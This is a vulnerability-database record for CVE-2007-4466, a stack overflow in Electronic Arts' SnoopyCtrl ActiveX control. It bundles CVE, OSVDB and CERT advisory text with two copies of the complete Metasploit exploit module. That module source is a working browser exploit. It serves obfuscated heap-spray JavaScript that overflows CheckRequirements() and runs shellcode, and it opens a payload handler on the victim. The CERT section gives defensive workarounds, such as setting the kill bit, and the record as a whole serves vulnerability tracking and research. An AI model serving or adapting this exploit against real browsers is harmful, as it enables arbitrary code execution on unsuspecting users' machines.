Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow
2009-10-15T15:22:16
ID MSF:EXPLOIT/WINDOWS/BROWSER/EA_CHECKREQUIREMENTS Type metasploit Reporter Rapid7 Modified 2017-10-05T21:44:36
Description
This module exploits a stack buffer overflow in the Electronic Arts SnoopyCtrl ActiveX Control (NPSnpy.dll 1.1.0.36). When an overly long string is passed to the CheckRequirements() method, an attacker may be able to execute arbitrary code in the context of the browser user. The module serves a web page that instantiates the control (ProgID SnoopyX.SnoopyCtrl.1), sprays the heap at 0x0c0c0c0c and relies on that spray rather than a fixed return address (the target's Ret is empty), so success depends on the client's memory layout. No vendor fix is recorded; the CERT advisory's workaround is to set the kill bit for CLSID {525A15D0-4938-11D4-94C7-0050DA20189B} in Internet Explorer or to remove NPSnpy.dll from the plugins directory of other browsers.
{"id": "MSF:EXPLOIT/WINDOWS/BROWSER/EA_CHECKREQUIREMENTS", "type": "metasploit", "bulletinFamily": "exploit", "title": "Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl ActiveX Control (NPSnpy.dll 1.1.0.36). When sending an overly long string to the CheckRequirements() method, an attacker may be able to execute arbitrary code.\n", "published": "2009-10-15T15:22:16", "modified": "2017-10-05T21:44:36", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4466"], "cvelist": ["CVE-2007-4466"], "lastseen": "2020-10-06T05:17:19", "viewCount": 18, "enchantments": {"score": {"value": 8.0, "vector": "NONE", "modified": "2020-10-06T05:17:19", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-4466"]}, {"type": "cert", "idList": ["VU:179281"]}, {"type": "exploitdb", "idList": ["EDB-ID:16609"]}, {"type": "osvdb", "idList": ["OSVDB:37723"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83110"]}], "modified": "2020-10-06T05:17:19", "rev": 2}, "vulnersScore": 8.0}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ea_checkrequirements.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}
{"cve": [{"lastseen": "2021-02-02T05:31:25", "description": "Multiple stack-based buffer overflows in Electronic Arts (EA) SnoopyCtrl ActiveX control (NPSnpy.dll) allow remote attackers to execute arbitrary code via unspecified methods and parameters.", "edition": 4, "cvss3": {}, "published": "2007-10-09T22:17:00", "title": "CVE-2007-4466", "type": "cve", "cwe": ["CWE-119", "CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-4466"], "modified": "2017-07-29T01:32:00", "cpe": ["cpe:/a:electronic_arts:snoopyctrl:*"], "id": "CVE-2007-4466", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4466", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:electronic_arts:snoopyctrl:*:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:20:51", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4466"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83110", "href": "https://packetstormsecurity.com/files/83110/Electronic-Arts-SnoopyCtrl-ActiveX-Control-Buffer-Overflow.html", "sourceData": "`### \n## This file is part of the Metasploit Framework and may be subject to \n## redistribution and commercial restrictions. Please see the Metasploit \n## Framework web site for more information on licensing and terms of use. 
\n## http://metasploit.com/projects/Framework/ \n### \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Electronic Arts SnoopyCtrl \nActiveX Control (NPSnpy.dll 1.1.0.36. When sending a overly long \nstring to the CheckRequirements() method, an attacker may be able \nto execute arbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'MC' ], \n'Version' => '$Revision:$', \n'References' => \n[ \n[ 'CVE', '2007-4466' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] \n], \n'DisclosureDate' => 'Oct 8 2007', \n'DefaultTarget' => 0)) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n# Re-generate the payload. \nreturn if ((p = regenerate_payload(cli)) == nil) \n \n# Encode the shellcode. 
\nshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) \n \nret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, \"or al, 12\").encode_string * 2) \n \njs = %Q| \ntry { \nvar evil_string = \"\"; \nvar index; \nvar vulnerable = new ActiveXObject('SnoopyX.SnoopyCtrl.1'); \nvar my_unescape = unescape; \nvar shellcode = '#{shellcode}'; \n#{js_heap_spray} \nsprayHeap(my_unescape(shellcode), 0x0c0c0c0c, 0x40000); \nfor (index = 0; index < 5000; index++) { \nevil_string = evil_string + my_unescape('#{ret}'); \n} \nvulnerable.CheckRequirements(evil_string); \n} catch( e ) { window.location = 'about:blank' ; } \n| \n \nopts = { \n'Strings' => true, \n'Symbols' => { \n'Variables' => [ \n'vulnerable', \n'shellcode', \n'my_unescape', \n'index', \n'evil_string', \n] \n} \n} \njs = ::Rex::Exploitation::ObfuscateJS.new(js, opts) \njs.update_opts(js_heap_spray.opts) \njs.obfuscate() \ncontent = %Q| \n<html> \n<body> \n<script><!-- \n#{js} \n//</script> \n</body> \n</html> \n| \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, content) \n \n# Handle the payload \nhandler(cli) \nend \n \nend \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83110/ea_checkrequirements.rb.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "cvelist": ["CVE-2007-4466"], "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:27143](https://secuniaresearch.flexerasoftware.com/advisories/27143/)\nISS X-Force ID: 37020\nFrSIRT Advisory: ADV-2007-3415\n[CVE-2007-4466](https://vulners.com/cve/CVE-2007-4466)\nCERT VU: 179281\nBugtraq ID: 25970\n", "edition": 1, "modified": "2007-10-08T00:00:00", "published": "2007-10-08T00:00:00", "href": 
"https://vulners.com/osvdb/OSVDB:37723", "id": "OSVDB:37723", "title": "SnoopyCtrl ActiveX (NPSnpy.dll) Unspecified Method Arbitrary Code Execution", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cert": [{"lastseen": "2020-09-18T20:42:28", "bulletinFamily": "info", "cvelist": ["CVE-2007-4466"], "description": "### Overview \n\nThe Electronic Arts SnoopyCtrl ActiveX control and plug-in contains multiple stack buffer overflows, which could allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nElectronic Arts (EA.com) provides an ActiveX control and Netscape-style plug-in called SnoopyCtrl. This control, provided by `NPSnpy.dll`, is included with an EA.com update package. The SnoopyCtrl ActiveX control and plug-in contains buffer overflow vulnerabilities in multiple methods and initialization parameters. \n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), a remote, unauthenticated attacker may be able to execute arbitrary code with the privileges of the user on a vulnerable system. \n \n--- \n \n### Solution \n\nWe are currently unaware of a practical solution to this problem. Please consider the following workarounds \n \n--- \n \n**Disable the SnoopyCtrl ActiveX control in Internet Explorer** \n \nThe vulnerable ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID: \n \n`{525A15D0-4938-11D4-94C7-0050DA20189B}` \nMore information about how to set the kill bit is available in [Microsoft Support Document 240797](<http://support.microsoft.com/kb/240797>). 
Alternatively, the following text can be saved as a `.REG` file and imported to set the kill bit for this control: \n \n`Windows Registry Editor Version 5.00` \n \n`[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{525A15D0-4938-11D4-94C7-0050DA20189B}]` \n`\"Compatibility Flags\"=dword:00000400` \n**Disable the SnoopyCtrl plug-in in other browsers** \n \nThe SnoopyCtrl plug-in can be disabled in other browsers, such as Firefox, by removing the `NPSnpy.dll` file from the `plugins` directory. \n \n**Disable ActiveX** \n \nDisabling ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this and other ActiveX vulnerabilities. Instructions for disabling ActiveX in the Internet Zone can be found in the \"[Securing Your Web Browser](<http://www.cert.org/tech_tips/securing_browser/#Internet_Explorer>)\" document. \n \n**Disable plug-ins** \n \nDisabling plug-ins by default can prevent exploitation of this and other plug-in vulnerabilities. This can be accomplished by configuring [NoScript](<https://addons.mozilla.org/en-US/firefox/addon/722>) to `Forbid other plugins` for untrusted sites. \n \n--- \n \n### Vendor Information\n\n179281\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. 
Click here to view vendors.**\n\n### Electronic Arts __ Affected\n\nNotified: June 04, 2007 Updated: August 25, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease disable the vulnerable ActiveX control and plug-in.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23179281 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://secunia.com/advisories/27143/>\n * <http://www.securityfocus.com/bid/25970>\n * <http://support.microsoft.com/kb/240797>\n * <https://addons.mozilla.org/en-US/firefox/addon/722>\n\n### Acknowledgements\n\nThis vulnerability was reported by Will Dormann of the CERT/CC.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-4466](<http://web.nvd.nist.gov/vuln/detail/CVE-2007-4466>) \n---|--- \n**Severity Metric:** | 4.02 \n**Date Public:** | 2007-10-08 \n**Date First Published:** | 2007-10-08 \n**Date Last Updated: ** | 2007-10-09 13:40 UTC \n**Document Revision: ** | 14 \n", "modified": "2007-10-09T13:40:00", "published": "2007-10-08T00:00:00", "id": "VU:179281", "href": "https://www.kb.cert.org/vuls/id/179281", "type": "cert", "title": "Electronic Arts SnoopyCtrl ActiveX control and plug-in stack buffer overflows", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T00:14:59", "description": "Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow. CVE-2007-4466. 
Remote exploit for windows platform", "published": "2010-11-11T00:00:00", "type": "exploitdb", "title": "Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4466"], "modified": "2010-11-11T00:00:00", "id": "EDB-ID:16609", "href": "https://www.exploit-db.com/exploits/16609/", "sourceData": "##\r\n# $Id: ea_checkrequirements.rb 10998 2010-11-11 22:43:22Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl\r\n\t\t\t\tActiveX Control (NPSnpy.dll 1.1.0.36. 
When sending a overly long\r\n\t\t\t\tstring to the CheckRequirements() method, an attacker may be able\r\n\t\t\t\tto execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'Version' => '$Revision: 10998 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-4466' ],\r\n\t\t\t\t\t[ 'OSVDB', '37723'],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Oct 8 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\t# Re-generate the payload.\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\t# Encode the shellcode.\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\tret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, \"or al, 12\").encode_string * 2)\r\n\r\n\t\tjs = %Q|\r\n\t\t\ttry {\r\n\t\t\t\tvar evil_string = \"\";\r\n\t\t\t\tvar index;\r\n\t\t\t\tvar vulnerable = new ActiveXObject('SnoopyX.SnoopyCtrl.1');\r\n\t\t\t\tvar my_unescape = unescape;\r\n\t\t\t\tvar shellcode = '#{shellcode}';\r\n\t\t\t\t#{js_heap_spray}\r\n\t\t\t\tsprayHeap(my_unescape(shellcode), 0x0c0c0c0c, 0x40000);\r\n\t\t\t\tfor (index = 0; index < 5000; index++) {\r\n\t\t\t\t\tevil_string = evil_string + my_unescape('#{ret}');\r\n\t\t\t\t}\r\n\t\t\t\tvulnerable.CheckRequirements(evil_string);\r\n\t\t\t} catch( e ) { window.location = 'about:blank' ; }\r\n\t\t|\r\n\r\n\t\topts = {\r\n\t\t\t'Strings' => true,\r\n\t\t\t'Symbols' => 
{\r\n\t\t\t\t'Variables' => [\r\n\t\t\t\t\t'vulnerable',\r\n\t\t\t\t\t'shellcode',\r\n\t\t\t\t\t'my_unescape',\r\n\t\t\t\t\t'index',\r\n\t\t\t\t\t'evil_string',\r\n\t\t\t\t]\r\n\t\t\t}\r\n\t\t}\r\n\t\tjs = ::Rex::Exploitation::ObfuscateJS.new(js, opts)\r\n\t\tjs.update_opts(js_heap_spray.opts)\r\n\t\tjs.obfuscate()\r\n\t\tcontent = %Q|<html>\r\n<body>\r\n<script><!--\r\n#{js}\r\n//</script>\r\n</body>\r\n</html>\r\n|\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16609/"}]}